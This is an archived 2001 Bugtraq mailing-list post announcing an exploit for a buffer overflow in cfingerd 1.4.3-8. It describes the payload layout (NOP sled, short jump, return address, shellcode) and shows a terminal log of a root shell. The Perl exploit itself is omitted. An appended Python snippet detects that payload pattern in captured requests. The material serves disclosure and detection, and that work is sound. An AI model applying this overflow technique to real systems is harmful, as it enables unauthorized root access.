Another exploit for cfingerd <= 1.4.3-8


Date: Wed, 11 Jul 2001 20:19:19 +0200
From: teleh0r <teleh0r@digit-labs.org>
To: BUGTRAQ@securityfocus.com
Subject: Another exploit for cfingerd <= 1.4.3-8


Dear bugtraq readers,

This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844

In order to allow for more nops, I have constructed the payload
like this:

<82 nops><jmp 0x4><retaddr><shellcode>

[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xbffff46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#

Tested against cfingerd 1.4.3-8.

Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
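As an added example, not part of the original post and not the attached cfingerd-exploit.pl: a signature check a defender can run over a captured finger request to flag the <nops><jmp 0x4><retaddr><shellcode> layout described above. The sample request is constructed for the test; 0xbffff46c is the address the post prints, and the trailing 0xcc bytes are placeholders, not code.

```python
"""Flag the NOP-sled / jmp-over-return-address layout in a captured request.
Added example, not teleh0r's code; the SAMPLE bytes below are constructed."""
import struct

NOP = 0x90          # x86 single-byte NOP
JMP_SHORT = 0xEB    # x86 'jmp rel8' opcode
RET_SLOT = 4        # a 32-bit return address occupies 4 bytes

def find_jmp_over_sled(data: bytes, min_nops: int = 16):
    """Return details of the first <nops><jmp rel8><4-byte addr> run in
    `data`, or None. A displacement equal to RET_SLOT means the short jump
    lands exactly past the return-address slot, i.e. the layout in the post;
    any other forward displacement is still reported for the analyst."""
    i, n = 0, len(data)
    while i < n:
        if data[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and data[i] == NOP:
            i += 1
        sled_len = i - start
        if sled_len < min_nops or i + 1 >= n or data[i] != JMP_SHORT:
            continue
        disp = data[i + 1]                    # unsigned rel8 displacement
        if disp == 0 or disp > 0x7F:          # no-op or backward jump: not this pattern
            continue
        addr_off = i + 2                      # byte right after the 2-byte jmp
        if addr_off + RET_SLOT > n:
            continue
        addr = struct.unpack("<I", data[addr_off:addr_off + RET_SLOT])[0]
        return {
            "sled_offset": start,
            "sled_len": sled_len,
            "jmp_disp": disp,
            "skips_ret_slot": disp == RET_SLOT,
            "ret_addr": addr,                 # little-endian value in the slot
            "payload_offset": addr_off + disp,  # where execution lands after the jmp
        }
    return None

# Constructed sample: 82 NOPs, jmp +4, the address from the post, placeholders.
SAMPLE = (bytes([NOP] * 82) + bytes([JMP_SHORT, 0x04])
          + struct.pack("<I", 0xBFFFF46C) + b"\xcc" * 8)
BENIGN = b"teleh0r\r\n"                       # an ordinary finger request
```

With `min_nops` at its default, a normal username such as BENIGN returns None, while SAMPLE reports a 82-byte sled whose jump skips exactly the 4-byte return-address slot.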
[Attachment: cfingerd-exploit.pl (application/x-perl); the base64-encoded body is not reproduced in this archive copy.]

Created 1996-2003 by Maxim Chirkov  